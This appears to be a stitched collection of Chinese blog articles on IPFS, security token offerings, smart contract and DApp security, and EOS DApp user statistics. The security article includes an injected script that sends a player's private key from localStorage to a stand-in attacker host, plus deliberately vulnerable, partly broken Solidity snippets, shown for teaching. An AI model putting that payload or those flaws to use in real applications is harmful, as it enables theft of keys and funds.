站在Web3.0 理解IPFS是什么

尽管网络上,已经有不少文章讨论IPFS,不过真正讲明白IPFS想做什么的很少,文本尝试站在未来Web3.0的高度来看看IPFS究竟用来解决什么问题。

DApp 的缺陷

对区块链有所了解的同学,知道区块链维护的是一个中立的(去中心)、共同信任、难以篡改的数据库、智能合约创造的是一个完全透明(不被干扰)的运行规则,因此可以解决信任问题。

一切看起来很美好,我们可以开发去中心化应用DApp 解决信任问题,由此也确实产生了很多的博彩类DApp游戏。

不熟悉DApp的同学可以看我另一篇文章程序员如何切入区块链去中心化应用开发.

细心的同学,也许会发现一个问题,虽然DApp的后台逻辑(智能合约)是在无中心的节点上运行的透明的规则,但是我们看到内容却来自于一台无信任的中心化服务器。

这是由当前互联网规则-超文本媒体传输协议(HTTP)决定的,简单来讲,在这个协议下,当我们在浏览器输入一个网址时,总是会先找到这个网址(域名)对应的服务器IP地址,然后请求服务器,并把服务器的响应显示在浏览器。

这种方式下文件能否访问,完全取决于服务器,服务器也许会关闭、内容获取被篡改或删除,对用户都无法保证。我自己看到好内容把网页收藏的习惯,经常会出现过一段时间再去访问的时候,页面已经不存在了。

IPFS想要做什么

IPFS – InterPlanetary File System 星际文件系统,多数人谈到IPFS都只讲到它的去中心化存储,其实IPFS想要做的远不只存储,其目标是取代HTTP,成为Web3.0时代的基础协议。我们从其官网对IPFS的定义就可以看到其雄心。

尽管Web3.0目前没有明确定义,从2014年以太坊联合创始人Gavin Wood提出分布式网络的Web3.0概念开始,业界普遍认为Web3.0 特征应该是 分布式、可信任。

在官网的有这样两个描述:

  1. IPFS is the Distributed Web A peer-to-peer hypermedia protocol to make the web faster, safer, and more open.
  2. IPFS aims to replace HTTP and build a better web for all of us.

翻译过来就是: 1. IPFS是分布式Web,是点对点的超媒体协议,以构建更快、更安全、更开放的网络。 2. IPFS旨在取代HTTP,为我们构建一个更好的web。

当然,要完全取代HTTP还有一段路要走,最大的坎是怎样让‍‍主流的浏览器支持IPFS协议,‍‍现在是通过HTTP网关的方式访问IPFS网上面存在的文件。 未来IPFS能取代Http的话?就是通过网络浏览器里直接输入 ipfs://文件hash
访问内容,‍‍目前这种方式访问IPFS 必须依靠浏览器插件ipfs 伴侣, 并且这个插件的使用不广泛。

注意,这里提到的浏览器,只是沿用这个名词,Web3.0的浏览器也许不叫浏览器, 它更可能是数字钱包和浏览器的组合体,现在浏览器上发起交易也同样需要依靠钱包插件进行签名。所以这样一个形态的产品也是大家的机会,这是一个全新的超大入口级产品。

即未来期望的访问方式是这样的: ipfs://Qme2qNy61yLj9hzDm4VN6HDEkCmksycgSEM33k4eHCgaVu

而现在通过网关访问是这样的: http://127.0.0.1:8080/ipfs/Qme2qNy61yLj9hzDm4VN6HDEkCmksycgSEM33k4eHCgaVu https://ipfs.io/ipfs/Qme2qNy61yLj9hzDm4VN6HDEkCmksycgSEM33k4eHCgaVu

IPFS是怎么做的

IPFS是一种内容可寻址、版本化、点对点超媒体的分布式存储、传输协议。

我们知道在现在的网络服务里,内容是基于位置(IP)寻址的,就是在查找内容的时候,需要先找到内容所在的服务器(根据IP),然后再在服务器上找对应的内容。 而在IPFS的网络里,是根据内容寻址,每一个‍‍上传到IPFS上面去的文件、文件夹,都是以Qm为开头字母的哈希值,无需知道文件存储在哪里,通过哈希值就能够找到这个文件,这种方式叫内容寻址。

工作原理

在IPFS系统中,内容会分块存放(如果内容很小就会直接存在DHT中),并分散存储在IPFS网络中的节点上(不过目前的IPFS实现,一个节点会完整保存内容的所有区块)。系统会给内容的每一个块计算哈希值,然后把所有块的哈希值拼凑起来,再计算一次哈希值,从而得到最终的哈希值。同时每个节点会维护一张DHT(分布式哈希表),包含数据块与目标节点的映射关系。

在IPFS中是通过哈希去请求文件的,它就会使用这个分布式哈希表找到文件所在的节点,取回文件根据哈希重新组合文件(同样也会验证文件)。

IPFS的特点

根据前面的原理,我们可以推倒出IPFS的几个特点:

  1. 当我们知道一个文件的哈希值之后,可以确保文件不被修改, 即可以确保访问的文件是没有被篡改的。因为根据哈希的特点,哪怕源文件有一丁点的更改,对应的哈希值也会完全不同。
  2. (理论上) 如果IPFS得以普及,节点数达到一定规模,内容将永久保存,就算部分节点离线,也不会影响文件的读取,不像现在的收藏会失效。
  3. 由于IPFS是一个统一的网络,只要文件在网络中被存储过,除了必要的冗余备份,文件不会被重复存储,对比现有互联网,信息孤岛,各中心间不共享数据,数据不的不重复存储,IPFS一定意义上节约了空间,使得整个网络带宽消耗更低,网络更加高效。
  4. 相对于中心化存储的容易遭受DDOS攻击,IPFS采用分布式存储网络,文件被存储在不同的网络节点,天然避免了DDOS攻击,同时一个文件可以同时从多个节点同时下载,通信的效率也会更高。

IPNS

在IPFS中,一个文件的哈希值完全取决于其内容,修改它的内容,其相应的Hash值也会发生改变。这样有一个优点是保证文件的不可篡改,提高数据的安全性。 但同时我们在开发应用(如网站)时,经常需要更新内容发布新版本,如果每次都让用户每次在浏览器中输入不同的IPFS地址来访问更新后内容的网页,这个体验肯定是无法接受的。

IPFS提供了一个解决方案IPNS(Inter-Planetary Naming System),他提供了一个被私钥限定的IPNS哈希ID(通常是PeerID),其用来指向具体IPFS文件哈希,当有新的内容更新时,就可以更新IPNS哈希ID的指向。

为了方便大家理解,做一个类比,和DNS类似, DNS记录了域名指向的IP地址, 如果服务器更改,我们可以更改DNS域名指向,保证域名指向最新的服务器。 IPNS则是用一个哈希ID指向一个真实内容文件的Hash,文件更新这更改哈希ID的指向,当然更新指向需要有哈希ID对应的私钥。

通过IPNS访问文件的方式如下:

利用插件访问:ipns://QmYM36s4ut2TiufVvVUABSVWmx8VvmDU7xKUiVeswBuTva 利用网关访问: http://127.0.0.1:8080/ipns/QmYM36s4ut2TiufVvVUABSVWmx8VvmDU7xKUiVeswBuTva

IPNS同样兼容DNS,使用DNS TXT记录域名对应的IPNS哈希ID,就可以域名来替换IPNS哈希ID来进行访问。从而实现更容易读写和记忆。

例如使用以下方式简化访问: ipns://ipfs.io https://ipfs.io/ipns/ipfs.io/

IPFS/IPNS 如果使用,将在后面的文章进一步介绍。

小结

IPFS是一项非常激动人心的技术,尽管它仍在发展的早期(区块链也是),还有很多问题需要我们一起解决,如NAT穿透问题,浏览器支持问题,内容存储激励问题,存储数据安全与隐私保护问题。 但是通过 IPFS + 区块链将真正创建Web3.0时代的应用,这是一个完全可信的、自运转(不停机)的应用,它可以做什么我不知道,我对未来充满期待。

已经凉去的STO,让我想起了90年代的柯达

导读

圈内居然有如此之多的人们曾经追逐过STO这个概念,同时寄希望于STO引领下一波牛市的到来,这让我深深感到吃惊。与此类似的,圈内也有某些人鼓吹将App上链,变成Dapp,这也不由令我觉得好笑。这些人的思路宛若90年代的柯达,他们总是站在老派的、传统的立场去思考一样新鲜事物,试图把老的经验照搬到新事物上来,或者直接无视新事物的特性,回归到旧的叙事中去。本文要指出的是,这样的尝试最终会被新的趋势淘汰。

随着监管态度的日益明确,STO这个概念现在基本已经凉了。曾几何时,币圈的某些“右派”们一度寄希望于通过放弃去中心化、展现出“拥抱监管”的态度,进而获得监管的承认。不幸的是,他们所构想的那个世界不仅与真正喜爱区块链的人所想的有天壤之隔,也没有给政府带来新的增量,最终被抛掷在一边。

在我看来,推举STO是在去年ICO泡沫破灭后,某些不懂区块链、被裹挟进这个圈子的传统人士的一种无奈之举。他们可能没有想到的是,一旦引入了中心化监管机构,区块链技术也就失去了它原本的魅力,STO和传统证券市场也没有了根本性的区别。既然如此,政府还要引入STO做什么呢?

同时,圈内居然还有如此之多的人们曾经追逐过STO这个概念,并寄希望于STO引领下一波牛市的到来,这又让我深深感到吃惊。前段时间,我又跟朋友深聊了一次,我的观点是STO不值得浪费时间深入研究,因为它必将成为历史长河中的一朵水花,并且无法激起任何波澜。

与此类似的,圈内也有某些人鼓吹将App上链,变成Dapp,这也不由令我觉得好笑。这些人的思路宛若90年代的柯达,他们总是站在老派的、传统的立场去思考一样新鲜事物,试图把老的经验照搬到新事物上来,或者直接无视新事物的特性,回归到旧的叙事中去。本文要指出的是,这样的尝试最终会被新的趋势淘汰。

01

柯达的战略败局:旧技术扶贫,押宝新兴市场

100多年来,柯达一直是胶卷工业的代名词。提起“Kodak Moment”(“柯达时刻”),人家自然联想到那些曾记录美好时光的照片。然而在2012年,这个曾经的巨无霸企业正式申请破产保护,彼时,柯达公司负债总额达到67.5亿美元,而包括专利在内的所有资产的价值总额只有51亿美元,已经资不抵债。

柯达的失败是源于数字技术的兴起。上世纪90年代,数码相机的出现严重的冲击了柯达在欧美市场的相纸业务。经过详细的分析,柯达将眼光盯在90年代后期,刚刚战胜日本富士,重新夺回市场主导低位置的中国市场。柯达判断,中国是最大的发展中国家,经济在飞速发展,人们对于生活记录的需求也在快速增长,这个拥有全世界最大人口规模的增量市场,必将发展成为世界最大的胶卷市场。所以,柯达决心在中国市场实施庞大的发展计划。

1994年初,柯达公司新总裁裴学德刚刚上任两周,就率领公司代表团访华,提出并最终完成收购中国七家感光企业,成立柯达(中国)股份有限公司,柯达占80%的股份,中国七家感光企业加起来占20%的股份。 根据协议,柯达承诺投入10亿美元,并把世界一流的感光技术带到中国。

中国市场成为柯达的救命稻草。2000年中国市场销售额超过5亿美元,2003年,柯达中国公司销售超过10亿美元,中国成为仅次美国的第二大市场,而且成长迅速。柯达还在中国建立了庞大的市场渠道,据统计,截至2002年年底,柯达彩印店在中国的数量达到8000多家,是肯德基的10倍,麦当劳的18倍。

出乎柯达预料的是,没过多久,数码相机就以潮水般的速度快速蚕食中国胶卷市场的份额。数码相机是从1996年下半年才开始进入中国市场,但因为数码相机操作更简单,可以即时成像,即时存储,还省去了繁杂又昂贵的冲洗流程,快速受到了大众的欢迎。根据市场研究公司IDC提供的统计数据,2010年数码相机市场前五位的品牌分别是佳能19%,索尼17.9%,尼康12.6%,三星11.1%,松下7.6%。柯达仅居第六位,而且还在下滑。

2008年,智能手机的出现更加速了胶卷相机被淘汰的过程,随着各家手机厂商对相机的优化,高清摄像头、AI成像等技术的运用,智能手机彻底改变了我们照相和分享照片的方式。胶卷也逐渐沦为小众摄影狂热爱好者的需求。柯达也因此退出了历史舞台,讽刺的是数码相机的第一架原型机就是柯达发明的。

柯达溃败最重要的原因是新技术的冲击。然而在新技术趋势下,柯达用胶卷时代的经验来判断新技术下的市场前景,押宝中国这样的新兴市场,加速了溃败的过程。

02

STO的“柯达谬误”

STO全称为“Security Token Offering”,即证券型通证发行,其目标是在一个合法合规的监管框架下,进行token的公开发行。

STO的流行要追溯到ICO。这种利用eth智能合约兴起资金募集形式,在比特币减半引发的牛市中,吸引了大量增长资金和区块链项目方入场,但火爆的背后是项目鱼龙混杂,诈骗币、空气币充斥市场,目前多国政府已经命令禁止ICO类的融资活动。在ICO泡沫破灭不久后,在合法合规监管框架下横空出世的STO,一下子成为区块链圈的救命稻草,吸引了足够多的市场眼球。

我们仔细分析这个逻辑,在区块链这一新技术快速发展过程中,因为ICO缺乏合规性,所以推出一个合规性的STO,希望解决合规的问题,是不是很像数码相机技术快速发展过程中,因为欧美、日本市场受到冲击,因此本能的反应选择新兴市场中国尝试突破?

这种想法如此简单易行,几乎是下意识的。然而,最容易走的那条路,往往是错误的。如果说区块链创造了什么新的东西,那就是信任,这种信任建立在将写节点分离出去的技术基础上,它无需准入,能够面对系统中有坏人而不被击溃。但STO则放弃了区块链技术的诉求,又把区块链想要去掉的中心请回来了。

与柯达类似的还有诺基亚,面对智能手机的冲击,逐渐退出历史舞台

面对颠覆式的新技术冲击,运用在旧有的逻辑对未来做出判断,往往会付出惨痛的代价,预测未来需要,需要走出自己对世界的旧有认知,尝试理解新事物的内在逻辑,用新事物的运行规律来预测,才有可能成立。

03

STO降低了攻击成本

提到区块链不得不提到一个词“去中心化”。从我了解区块链开始,去中心化就成为最高指示,无数的人对其进行解读。传播最广泛的是V神在《去中心化的意义》中做出的解读,他提出去中心化的三个原因

1、容错:去中心化系统很少会因为某个局部故障而导致整个系统崩溃,因为它依赖于很多独立工作的组件;

2、阻止攻击:想要攻击或操纵去中心系统的成本更高,因为他们基本上没有敏感薄弱的“中心弱点”,而中心化系统的攻击成本则要低得多;

3、抵制合谋——去中心化系统参与者们很难合谋勾结在一起,而对于传统企业和政府领导者而言,他们通常会为了自己的利益互相勾结,最终损害的是公民、客户、员工和广大人民。”

把这三点综合起来理解,容错是提高了系统崩溃的成本,阻止攻击是提高了系统攻击的成本,抵制合谋更容易理解,因此,三者合在一起,可以理解为“去中心化”是一种手段,最终提高了任何参与者做恶成本。

我们常听到人说:“区块链是一个不可篡改的账本。”这并非说区块链完全不可篡改,“51%算力”攻击就是利用算力优势篡改区块链的记录的典型案例。但在pow设计中,节点每一次记账都需要付出很高的算力成本,包括矿机的成本、电费、矿场建设费、人工费用等等。而对于价值高的项目,比如BTC、BCH,由于竞争节点数量较多,发动51%攻击所需付出的成本更高,况且攻击后,币价肯定会大幅波动,更加得不偿失。

同理,POS需要锁定一定数量的币,锁定越多的大户越希望项目良性发展,获得更多奖励,而不是高价买大量的币,再破坏整个体系,让自己手中的币一文不值。

从做恶成本的角度来看,STO在去中心化的基础上增加一个监管机构,由这个机构来监督。但这个监管机构的增加,看似设置门槛,实则降低了门槛,因为这个机构几乎不承担做恶的成本,不做恶他没有获得收益,做恶他也不会明显丧失收益。不像现有区块链的体系里,任何一次做恶实际都是杀敌一千自损八百,甚至是杀敌八百自损一千,只有傻子愿意做这种事情。

可能有些人寄希望于这个监管机构独立公正,然而事实却是,存在着太多的方法影响这个机构的决策——就连EOS的21个节点竞选都曝出过贿选问题。我们永远不要低估人性的恶,只要有利可图,利益集团就会想尽办法干涉中心化决策机构。所以说,这种靠中心化的逻辑去解决去中心化的问题,无异于在数码相机时代,在相对落后国家推广胶卷技术,或是在智能手机时代,在非洲卖单一功能手机。

04

应在“请回中心”的方案之外,寻找新的解决之道

既然STO不能解决饱受诟病的ICO乱象,那么区块链的世界会不会更加混乱,空气币横行呢?我认为,传统思维无法解决区块链时代的问题,但以比特币为代表的区块链项目在10年间显示出旺盛的生命力,这意味着区块链有能力迭代出解决价值横行问题的能力,就像互联网用搜索、关系、算法解决了信息横行的问题一样。

这里我开个脑洞:既然“去中心化”最终提高了参与者做恶的成本,那么顺着做恶成本这个思路,我们或许可以找到解决方案。

在一篇名为《Web3.0世界的身份及声誉》的文章中,作者提出了一个观点:未来的身份就是账户地址,比如以太坊的以太坊账户地址。身份可以用来证明自己和他人曾发生过一些事,这些事称作声明。随着时间推演,声誉会随着身份体系建立起来。身份和声明都记录在一个不可篡改、去中心化的区块链上,普通用户可以通过被授权的方式访问身份、声明,从而判断这个人的声誉。

在这个体系里,一个人无论是自己做了恶事,还是参与过某个恶事,代言过某个恶事,站台过某个恶事,都成为声誉中的重要组成部分,并成为下次做恶的巨大成本。也就是说,你发了个空气币,未来你可能就彻底跟发币无缘了。

如果我们用一句精炼的话来概括,可以用这样九个字来描述系统:人在做,天在看,链在记。人们做恶之前自然会仔细掂量,滥发空气币的事件也会随之减少。在我看来,这样的一个系统,比所谓的STO要好得多。

简述智能合约及Dapp安全

智能合约和dapp的开发属于新的范式,开发的方式与以前会有所不同。 “敏捷开发”的格言在这个新范式中好像不起任何作用了,这类项目的开发会有一定的风险,这要求我们采用缓慢而有条理的方法来开发我们的应用程序,在设计和编码时尽量谨慎和考虑周全。 开发时也不能让自己承受过多的压力,比如制定严格的期限等。

如果把大多数传统的apps类比于社区诊所,那么区块链可以说是急诊室。有些很小的问题,一旦上链的话,就会变的很难解决,你必须考虑到所有可能的负面结果,如果没有这么做,你可能会面临非常可怕的后果。所以在我开始具体的内容之前,我必须要重申一下区块链开发方面的特点,这些迫使我们开发时要非常小心。

所有代码都是公开的

以下几个原因导致了一些的问题。

首先,区块链的代码是开源的,任何人都可以看到你写的代码,所以很明显,智能合约中不应记录敏感的个人信息。不然,你就可以进行用户的链上行为分析,但这对于小白用户来说可能听起来不太好,因为他的历史行为暴露在了全世界面前。

这就导致智能合约及其相关存储功能只能存储合同正常运行所必需的信息。

其次,最最重要的是,所有源代码都公开可见,这意味着在地下工作的明星黑客有充足的时间和自由,来梳理你的每一行代码,寻找其中的漏洞,代码将无处可藏。

Gas 限制

我相信大多数人都知道,以太坊的是有Gas费的,Gas费些许的昂贵,并且还有一定的限制!如果智能合约中的逻辑可以导致大量Gas消耗,则会出现严重的问题。循环调用是这种情况的常见原因。

最后也是最重要的一点是:

不可篡改特性

智能合约代码都是完全根据最初的逻辑执行,并禁止The DAO级别的硬分叉。对区块链来说,合约一旦部署,一切都将不可篡改。

不可篡改的有点是让我们可以高枕无忧的相信智能合约。我们首次将信任编程到代码中。陌生人之间可以信任代码,而不是彼此建立信任。我们慢慢的开始相信智能合约,它不会骗人,也不会在任何时候做出格的事情。

对我来说,我会以非常开放的心态拥抱全球的区块链霸主。并且作为工程师,我也会努力去实现这个信任社会。

但是这个信任社会有些致命问题,设想一下,如果我们家的技术文盲奶奶不小心把她的google搜索痔疮膏的信息发布到了Facebook上,这不会是大问题,可以删掉。但如果她在某个有漏洞的智能合约上暴露了自己的私钥,那我们就无能为力了,她精通技术的侄子也没有任何办法,区块链浏览器中历史记录将无法删除!

在写代码的时候,我们必须假设每个用户都是技术文盲,并百分百地确保函数的正确调用,执行能够操作无误,你永远都不会知道,有多少人盯着你钱包地址上的数百万美金。

接下来我将介绍一些准备好的漏洞示例,并且进行一些练习,让每个人都参与进来。以便我们在今后在写代码时能够避免Dapp和智能合约的漏洞。

实际案例推荐

我们来看第一个案例,让我们从一些背景开始。

这是一个去中心化的游戏平台

  • 它的应用程序都是基于浏览器的
  • 游戏开发者可以公开发布他们的游戏(在以太坊网络上运行的dapps)
  • 玩家可以注册dapp并从选择各种游戏(用ETH购买虚拟商品)。
  • 注册时会帮你创建新的钱包(这个案例不需要Mist 或Metamask)
  • 钱包密钥存储在玩家的浏览器中,用于验证和支付。

是的,这似乎是开发人员通过平台进行发布,并有效连接玩家的好地方。

不幸的是,有一款叫HODL QUEST的游戏在发布后,用户下载它时,他们钱包中的以太币数量就开始减少。

玩家的以太币去哪了呢?让我们先来看一下平台的一些情况:

l这个问题是几小时前发布的新游戏HODL QUEST引起的

l首次打开游戏后,钱包的资金几秒钟就消失了

l在游戏注册期间,开发人员在平台内的表单中输入dapp的名称,智能合约地址和URL

l该平台将游戏iframe嵌入到dapp中,同时在页面顶部显示游戏名称

你可以开始看看它的发展方向……经过进一步的检查,我们发现HODL QUEST游戏的开发者在注册过程中为游戏标题注入了一个内联脚本。所以仔细观察游戏html代码,我们发现了这样的事情:

<h1>HODL <script>$.post(‘https://haxxx.lol/’, localStore.getItem(‘privateKey’));</script> QUEST</h1>

The player’s browser ends up evaluating the javascript snippet inserted at the game title and sending the player’s private keys to attacker remote servers.

用户的浏览器插入了游戏标题的javascript片段,并将用户的私钥发到给攻击者远程服务器上。

这只是我们写Dapp时可能出现的众多问题之一,以下我列举的,在构建项目时要记住的事项清单:

  • 保护钱包和私钥:如果用户的钱包受到损害,那就game over了,所以处理这些敏感信息时需要特别小心。
  • 保护用户信息:用户不希望他们的个人数据暴露在世界各地,开发时要确保用户数据不被泄露。
  • 明智地评估需要存储在区块链或服务器中的内容,只能包含智能合约运行所必需的数据
  • 使用HTTPS:这是标准做法,应该是显而易见的
  • .gitignore敏感文件:保护自己免于意外泄露漏洞的另一种方法
  • 不要在代码中插入访问/ API密钥
  • 在dapp中执行关键/风险操作时要进行双重认证:在区块链上采取的操作是不可变的,因此链下的安全验证非常重要

DAPP的安全性与智能合约的安全性一样重要,希望广大开发者始终牢记在心。

智能合约竞争条件

什么是竞争条件?竞争条件是电子设备,软件或其他系统中的输出取决于其他不可控事件的顺序或时间一种行为。当事件没有按程序员的意图发生时,它就变成了一个bug。这是以太坊智能合约中许多漏洞的根源

一个关于race condition 愚蠢的例子

在以太坊智能合约中出现竞争条件的方式有几种。在这篇文章中,我们将关注两种常见情况。重入和交易顺序依赖。

重入

如果计算机程序可以在执行过程中被中断,则可以在其先前的调用完成执行之前安全地再次调用(“重新输入”),这被称为可重入计算机程序。在对其他合同进行外部调用时,这可能会显示在智能合约中,因为它们可能会在原始调用完成之前回调到原始函数。你可能会问,这怎么可能?

输入fallback 函数,这些函数是在将Ether发送到合约时调用的功能,而不提供要调用的函数名称。

在这个例子中,当withdraw函数使用address.call.value()方法发送ether时,它会触发BankRobber的fal’lback函数,然后可以再次调用withdraw方法。正如您所看到的,这将导致智能合同一次又一次地发送以太可能会耗尽所有以太币!

我们怎么能防止这种情况?有几种不同的方式。第一个依赖于我们对发送,转移和呼叫之间差异的理解。

从上图中可以看出,有许多不同的方式可以发送以太币,但大多数情况下,都推荐使用address.transfer。这是因为如果交易耗尽所有的2300 gas,就会回滚这样,如果恶意合同试图重新签订合同,gas将用完,整个交易将被还原。

在某些情况下,使用发送或回调是有意义的,但在使用这些时需要格外小心,因为只有在发送以太币感到非常满意时,才会出现这种情况。99%的时候,转移是正确的路径。

防止重入的另一种方法是在进行外部调用之前更新状态并在合同中执行检查,以确保状态代表即将执行的事务。

打包头部交易(交易顺序依赖)

另一种情况是竞争条件依赖,让恶意的交易被优先打包,这是区块链的开源性质决定的。如果在智能合约中运行竞价或类似机制,黑客可能会通过操纵gas价格,矿工打包交易时会在交易池中选择价格高的进行打包。在这段时间内,其他恶意行为者可以监控并发送恶意交易,来破坏已经发送的出价交易。矿工则会对区块中的交易价格进行重新排序,这就造成恶意交易被优先打包。

有几种不同的方法可以防止像这样的操纵。一个是把交易批量打包,另一个方法是披露投标人发送其出价的哈希值,在确认之前识别是不是恶意交易。

让我们来看看另一个例子

这个智能合约是一个游戏,用户可以将以太币送到只能合约中成为新的国王。当一个新人成为国王时,老国王就会收到只能合约中的以太币。你能找到这个漏洞吗?

这是Ethernaut的一个很好的例子,它开展了探索智能合约安全的练习。您可以在此处查看有关此漏洞的更详细说明。

这些示例表明,在进行外部调用时,绝不应该假设您调用的智能合约是可信的。始终注意防止攻击者可能尝试的所有可能的负面结果。

fallback函数

fallback函数很有用,因为它们包含在将Ether发送到您的合同时调用的代码。但他们无法处理一切。

首先,当从fallback函数触发时,回退功能只能访问2,300 gas,因此逻辑需要非常简单,以免发生gas错误。

// example of a fallback function when
// you don’t want Ether to be sent to a contract
function () payable {
revert()
}

有一个问题!当以太币被强制发送到合约时,后备功能不会触发

contract ForceSend() {

function ForceSend() {

// sends ETH to victim without triggering the fallback function
function destroy() {
selfdestruct(victim);
}
}

函数将智能合约的以太币发送到受害者地址。此发送不会触发合同中的回退功能。接收免费以太是很好的,但正因为如此,你需要避免直接检查合同的余额并期望它是一个特定值,因为它实际上可能比你想象的更大!

整数运算

与大多数现代架构不同,EVM不处理浮点数或算术运算。所有数字存储和算术都用整数处理。这是什么意思?这意味着您的合同中没有任何意义,您可以将任何内容存储为小数或执行通常会返回小数的操作,例如查找百分比等。让我们看一个例子。

想象一下,您正在创建一个代币销售智能合约,根据销售过去的时间为买家提供奖励购买。它可能看起来像这样。

/// snippet from contract code
function calculatePrice() returns (uint256) {
uint percentTimePassed = (now – startTime)/(endTime – startTime);

uint price = (1-percentTimePassed)*basePrice + basePrice;

return price;

}

正如您所看到的,用传统语言,通过的时间百分比将计算为0到1之间的小数,然后返回价格。

不幸的是,这不适用于整数运算。如果操作操作不正确,可能某些不正确的百分比会导致严重问题的情况。

在Solidity中,你必须做这样的事情:

/// snippet from contract code
function calculatePrice() returns (uint256) {
uint percentTimePassed = 100*(now – startTime)/(endTime – startTime);

uint price = ((1-percentTimePassed)*basePrice)/100 + basePrice;

return price;

}

百分比计算为0到100之间的整数,应用于基本价格,然后除以100以将“小数位”固定到正确的点。这是计算百分比的一种粗略方式,因为它牺牲了一些精度,但是根据EVM的运行方式是必要的。您可以通过乘以100的较大倍数来获得更好的精度,但这是一个取决于合同背景的决定。

整数溢出/下溢

根据维基百科,当算术运算尝试创建一个数值超出可以用给定位数表示的范围 – 大于最大值或低于最小可表示值时,就会发生整数溢出。大多数语言都有解决此问题的方法,但Solidity无法自行处理溢出检查。这导致过去在区块链上出现一些智能合约的问题,但有很多方法可以解决这个问题。以下是使用Solidity添加的示例:

function add(uint a, uint b) {
res = a + b
if (res-b == a) && (res>b || res==b)  {
// the operation was safe
} else {
// overflow
}
}

这通过确保结果没有包围变量所保持的最大值来检查加法运算的溢出。减法,乘法和除法需要类似的检查。

漏洞 3

你能找到智能合约中的错误吗?

uint[] public bonusCodes;

function pushBonusCode(uint code) onlyOwner {
bonusCodes.push(code);
}
function popBonusCode() onlyOwner {
require(bonusCodes.length >= 0);
bonusCodes.length–;
}
function modifyBonusCode(uint index, uint update) onlyOwner {
require(index < bonusCodes.length);
bonusCodes[index] = update;
}

此契约具有一个存储数组,其长度字段可以递减到0.这会导致算术下溢,从而有效地禁用Solidity的数组边界检查。因此,在溢出写入数组之后可以用来覆盖位于数组之后的任何存储元素 – 包括所有映射!

在开发的时候,我们并不能确定,有哪些没有考虑到的微小的点,单这些可能是导致归零的重大问题,在文中举的案例中,就导致用户平均损失了数百万美元。

我们所能做的最好的事情就是遵循所有现有的应用程序和智能合约范式,并且要要进行广泛测试,以及要让专业的安全人员帮我们审核代码。

未来,让我们一起共建智能合约的功能和安全性!

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

在生态爆发之下,存在着部分虚假繁荣的假象。本文将从 EOS DApp 的真实用户数讲起,涉及矿工、羊毛党的数据分析,接着延伸到 DApp 是否赚钱、过去一年 DApp 的发展以及未来的展望、新玩家 TRON 的崛起以及一份简易的古典币圈入场指南。

在 12 月 1 日区块链社区“链金术”举办的 DApp 开发者大会上,有人提出了一个新名词——“古典币圈”,泛指币圈内尚且没有接触过 DApp 的持币者。

在区块链的语境中,“古典”是嘲讽专用的贬义词。

大约一年前,币圈大佬们扛起区块链大旗向“古典互联网”吹响冲锋号角,Token Fund 们也打心眼里瞧不上“古典 VC ”——成王败寇,谁赚钱谁牛 X 。那时,DApp 圈才刚刚起步,DappReview 还在拿着 Excel 算加密猫的合成基因。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

如今,币市普跌 90% +,币圈大佬们的镰刀虽然锋利依旧,但曾经漫山遍野的韭菜们,连籽都被吃干抹净了。Token Fund(币圈基金)纷纷转做孵化和 FA(财务顾问,即帮项目融资),转型卖方,有余粮的基金屈指可数。

迷茫中,大家忽然间想起,好像在这堆空气币之外还有 DApp 这么个东西。它,能不能赚钱?

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患单单 11 月又增加了 3.5 亿的 EOS 流水

短短数周,集中涌现了几十个 DApp 公众号和社群,各大主流币圈媒体争先恐后增设 DApp 专区,开展一系列线上线下活动,唯恐错过这漫长寒冬里的一丝微光。

DApp 成为风口了吗?

DApp 真的火了么?到底有多火?

本文前半部分是理性客观的数据分析

后半部分是相对感性主观的一些观点

1 – EOS DApp 真实用户

我们先来看看,最具代表性的公链 EOS 上的 DApp 真实用户数据。

前几天看到一张截图

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

其中写到 11 月 EOS DApps 的月活有 73 万地址,然而可笑的是,截止到 11 月底,EOS 主网上总地址数量都没有达到这个数字。若无意外,该统计应该是将每天的活跃用户直接相加得到的月活跃用户。

那么真正的活跃用户有多少?DappReview 根据 11 月所有活跃 DApp 合约的全量交易数据进行计算得到:

11 月活跃 DApp 数量:174 个

11 月 DApp 用户总数:15.7 万

11 月活跃 DApp 总流水:3.5 亿 EOS

11 月 DApp 活跃用户总数:3.7 万

此处“活跃用户”的定义为,满足一下条件之一:

1. 11 月与 DApp 合约交互次数大于 30 次

2. 11 月与 DApp 交易流水大于 30 EOS

1.1 – 头部玩家 

我们先来看看这 3.7 万活跃用户

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

交易流水:超过一半的用户流水小于 100 EOS,7% 的用户流水大于 1 万 EOS。

使用过的 DApp 数量:超过一半用户只体验了不到 5 款 DApps,有 2% 的用户是 DApp 重度玩家,使用过 20 款以上。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

其中,头部玩家的数据是非常可怕,前 20 名头部玩家 DApp 流水加起来有 8975 万 EOS,占了 11 月总流水的 26% 。数据可以在 DappReview 的氪金排行榜 – https://player.dapp.review中查阅。

在本文开头我们看到,仅 11 月的交易额已经超过了 8-10 月的 1.5 倍,截止到今天,12 月刚过去一半,不难判断本月数据将会大幅超越 11 月。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

上图中 12 月份氪金排行榜第一名和第二名已经承包了 9000 万+EOS 的流水,超越了 11 月前 20 名大户的总和。 下面来看看这两个大户都在玩什么:

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

排名第一的大户 gamblinglife 主要在玩 BetDice 和 Big.Game。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

第二大户相对分散一些,BetDice、EOSBet、EOSMax、Big.Game、ToBet 雨露均沾,该大户的交易量非常惊人,15 天内刷出了263 万笔交易,要知道 11 月所有 DApps 总交易笔数也就 1 亿左右。

1.2 – DApp 活跃用户和矿工

在上一篇文章《80天80亿,寒冬下的暗流涌动——你所不了解的EOS DApp生态大爆发》中,我们介绍了BC类游戏的玩法逻辑 ——

DApp 中会发行自己的代币,该代币根据每一局游戏中玩家花费的金额分发给玩家(玩游戏即挖矿),同时有减半机制,在特定时间周期之后,玩游戏获得的代币数量会减半。

DApp 开发团队定期将部分利润分红给所有持币人。对持币人来说,即便玩 BC 类游戏的数学期望为负,但是可以通过积攒代币吃分红,以及代币上交易所后抛售来弥补 BC 游戏中的亏损,实现整体盈利。

